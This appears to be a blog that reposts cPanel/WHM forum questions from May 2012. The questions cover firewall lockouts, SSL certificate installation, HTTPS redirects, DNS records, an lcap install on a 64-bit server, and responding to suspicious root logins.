Posted by Bimo Hery Prabowo at 19.32, 0 comments
Cpanel Blog can't access our website May,2012
Hi guys,
I'm new here, so please bear with me.
I am not sure if it's a problem with csf/lfd, but the problem is that
access to our website is erratic.
It goes on and off every so often and will take as long as 30 minutes to 1 hour before it comes back again,
unless I restart csf/lfd.
I checked the logs every time the access goes down, and they say that
there is a failed login to cPanel.
Access gets blocked even though I already added our IP to the whitelist and the ignore list.
Can anybody assist me with this please...
I have been having the problem for two weeks now...
Any ideas will be greatly appreciated...
Thanks in advance.
can't access our website
Posted by Bimo Hery Prabowo at 13.32, 0 comments
Cpanel Blog Strange email with attachment from "cpanel" May,2012
Hello forum members -
I've had a server leased from a reputable cPanel partner for almost 2 years now. For the first time ever, I received an email apparently from cPanel with the following identifying information in the header:
<cpanel@host.servername.net>
Backup complete on host.servername.net
Received: from root by host.servername.net
(envelope-from <root@host.servername..net>)
for myname@sbcglobal.net; Wed, 02 May 2012 01:11:22 -0500
To: myname@sbcglobal.net
From: cpanel@host.servername.net
Subject: [cpbackup] Backup complete on host.servername.net
There was an attachment to the message: filenumber.log.txt
The message seems legitimately from cPanel, but as I say, I've never had one before, and have not opened the attachment for security concerns.
Should I be worried?
Best wishes
Strange email with attachment from "cpanel"
Posted by Bimo Hery Prabowo at 07.32, 0 comments
Sunday, 06 May 2012
Cpanel Blog Installing a UCC SSL Cert May,2012
We're running an Apache virtual server on Linux. WHM/cPanel is installed on top of that. I was reading past entries that talked about the issues installing a GoDaddy UCC through WHM. My question is: has anyone ever installed the UCC manually in Apache and bypassed using WHM to install the cert? My thought is that if the UCC were installed through Apache, the need to do the multi-step installs can be avoided. Has anyone done this? How did it work out?
Thanks!
Installing a UCC SSL Cert
Posted by Bimo Hery Prabowo at 19.32, 0 comments
Cpanel Blog Directing http to https May,2012
Hi
How can I redirect visitors to my domain www.mydomain.com to https://www.mydomain.com all the time?
I have a valid SSL for my domain with www. subdomain
Thank you
Directing http to https
Posted by Bimo Hery Prabowo at 13.32, 0 comments
[Cpanel Blog] Trouble installing LCAP on new 64bit server. May,2012
I finally went with a 64bit server (as opposed to 32bit), and now I can't seem to get lcap installed properly.
Here's the result of running uname -mrs
Linux 2.6.32-220.13.1.el6.x86_64 x86_64
I found what I believe to be the correct RPM here:
195.220.108.108/linux/dag/redhat/el6/en/x86_64/rpmforge/RPMS/lcap-0.0.6-6.2.el6.rf.x86_64.rpm
After downloading the rpm I install it with this:
rpm -Uvh lcap-0.0.6-6.2.el6.rf.x86_64.rpm
And I get what appears to be the normal output with the above.
But then, upon running this:
lcap CAP_SYS_PTRACE
I get this:
/proc/sys/kernel/cap-bound: No such file or directory
And sure enough, there is no cap-bound like there is on all the other cPanel servers where I have installed lcap.
Anyone know what may be the problem with this?
Thanks very much!
Trouble installing LCAP on new 64bit server.
Posted by Bimo Hery Prabowo at 07.32, 0 comments
[Cpanel Blog] Installing SAN SSL Certificate May,2012
Hello,
We have a CentOS (Linux) based web server which hosts multiple domains on a single IP (virtual hosts) and is managed through WHM/cPanel. We need to install a SAN SSL certificate (purchased from Trustwave) for 5 domains hosted on the server. Can you please provide me a step-by-step procedure to install/configure this through WHM/cPanel?
Any help in this regard will be highly appreciated.
Thanks in Advance.
Suresh.
Installing SAN SSL Certificate
Posted by Bimo Hery Prabowo at 01.32, 0 comments
Saturday, 05 May 2012
Cpanel Blog A-List or A-Record May,2012
Hello there,
Can you please tell me how to make the SSL certificate work for both www.domain.com and domain.com at the same time? Is it better to have it for www.domain.com or for domain.com?
I have been told that it is a good idea to make an A record from the DNS area; I am not sure how to do that. From DNS I clicked on "Add an A entry to your hostname" and I received this message:
Adding an A entry for your hostname
Adding A Entry...Bind reloading on vdc using rndc zone: [xxxx.com]
...Done
I appreciate your help.
A-List or A-Record
Posted by Bimo Hery Prabowo at 19.32, 0 comments
Cpanel Blog How to force secure login to _private folder? May,2012
During my latest PCI Compliance scan, one vulnerability that came up was that "web application transmits login credentials without encryption". The two examples it gave were:
http://www.domain.com/_private/
http://0.0.0.0/_private/
In WHM, I have the following security settings in place:
Require SSL: On
Enable HTTP Authentication: Off
I tried to use the following code in the .htaccess file in the _private folder, but it did not work:
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteCond %{REQUEST_URI} _private
RewriteRule ^(.*)$ https://www.domain.com/_private/$1 [R,L]
Can anyone tell me how to force SSL when accessing the _private folder from a browser?
How to force secure login to _private folder?
Posted by Bimo Hery Prabowo at 13.32, 0 comments
Cpanel Blog Disable wildcard subdomain May,2012
Is there an option (way) to disable wildcard subdomain creation, like *.domain.com?
I don't know if I am in the right forum.
Regards
Disable wildcard subdomain
Posted by Bimo Hery Prabowo at 07.32, 0 comments
Cpanel Blog Root logins from single unknown IP - what next steps, suspicious changes May,2012
Hi,
We have had root logins from an unknown IP a few times in the last few hours. Nothing seems to have been changed or damaged. This one was not a brute force attempt. So it could be someone in the organisation, legitimately logging in, but finding out who takes time in a company - and some damage can be done by then.
The damage could be insidious, hidden - installation of some rogue software / script / etc.
1. First thing I did was to change the root password.
2. Next, I plan to install and run rkhunter (which, yes, wasn't installed, so my bad). I have read that if root is compromised then a worst case scenario is that system binaries and even an installed rkhunter can be compromised/modified. So luckily in that sense, rkhunter is now reliable ;)
3. I have CSF+LFD running which is how I found out in the first place.
But the interesting thing is that in CSF, there is the option LF_INTEGRITY which I *definitely* had set to enabled, and it now shows the red "Warning" message.
I had to put CSF back into "Testing" mode for a while - does this disable LF_INTEGRITY checking automatically?
PT_SKIP_HTTP and PT_ALL_USERS are also not in force ("Warning")
Do these three have to be re-enabled every time when setting Testing to 0?
4. Brute force login attempts from rogue IP ranges is a very common daily occurrence with us now. CpHulk seems to discourage those fairly well (30 tries = banned for 15 days)
We have, of course, backed up everything offline.
Any other suggestions?
Thanks in advance,
Dave
Root logins from single unknown IP - what next steps, suspicious changes
Posted by Bimo Hery Prabowo at 04.18, 0 comments
Cpanel Blog Globalsign OneClickSSL WHM/cPanel Addon Not Working May,2012
I have a ticket open with my host and with globalsign, but you guys are the smart ones... anyone else having issues with the latest whm/cpanel upgrade killing their Globalsign OneClickSSL addon?
Is anyone's working properly on WHM 11.32.2 (build 25)?
Globalsign OneClickSSL WHM/cPanel Addon Not Working
Posted by Bimo Hery Prabowo at 04.15, 0 comments